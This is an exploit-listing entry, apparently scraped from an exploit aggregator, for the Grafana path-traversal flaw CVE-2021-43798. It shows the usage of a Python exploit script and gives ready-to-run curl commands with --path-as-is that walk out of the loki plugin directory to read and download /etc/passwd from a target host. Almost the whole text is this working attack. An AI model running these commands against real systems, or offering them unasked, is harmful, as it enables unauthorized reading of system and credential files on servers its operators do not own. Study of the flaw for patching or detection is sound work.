Exploit for Path Traversal in Grafana CVE-2021-43798

Name: Exploit for Path Traversal in Grafana CVE-2021-43798
Rating: 5 (129 reviews)

2023-01-09 | CVSS 5.0

## https://sploitus.com/exploit?id=6361D456-F76C-5B4C-9111-60E3F23BA63F
usage: grafana-exploit.py [-h] -H/--host HOST
grafana-exploit.py: error: the following arguments are required: -H/--host

example: python3 grafana-exploit.py --host <target_host>

if successfuly read arbitary-file situation
show the request URL and curl command

```
[+]RequestURL
http://example.host/public/plugins/loki/../../../../../../../../../../../../../etc/passwd
 
[+]curl_command
curl --path-as-is "http://example.host/public/plugins/loki/../../../../../../../../../../../../../etc/passwd"
```
so if you wanna download file execute like above

```
curl --path-as-is "http://example.host/public/plugins/loki/../../../../../../../../../../../../../etc/passwd" -o passwd
```